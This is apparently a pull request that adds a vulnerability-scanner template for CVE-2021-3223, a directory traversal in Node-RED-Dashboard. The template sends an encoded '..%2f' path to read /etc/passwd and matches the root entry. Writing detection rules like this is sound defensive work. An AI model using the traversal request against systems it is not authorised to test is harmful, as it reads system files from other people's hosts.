### PR TITLE
Create CVE-2021-3223.yaml

### DIFF
--- a/cves/2021/CVE-2021-3223.yaml
+++ b/cves/2021/CVE-2021-3223.yaml
@@ -15,7 +15,6 @@ requests:
     path:
       - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'
 
-    matchers-condition: and
     matchers:
       - type: regex
         regex:

--- a/cves/2021/CVE-2021-3223.yaml
+++ b/cves/2021/CVE-2021-3223.yaml
@@ -1,0 +1,22 @@
+id: CVE-2021-3223
+
+info:
+  name: Node RED Dashboard - Directory Traversal
+  author: gy741
+  severity: high
+  description: Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files.
+  reference: |
+    - https://github.com/node-red/node-red-dashboard/issues/669
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223
+  tags: cve,cve2020,node-red-dashboard,lfi
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"


### PR DESCRIPTION
Hello,

Added CVE-2021-3223 rule.

```
Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files.
```

Ref : 
- https://github.com/node-red/node-red-dashboard/issues/669
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223

Thanks.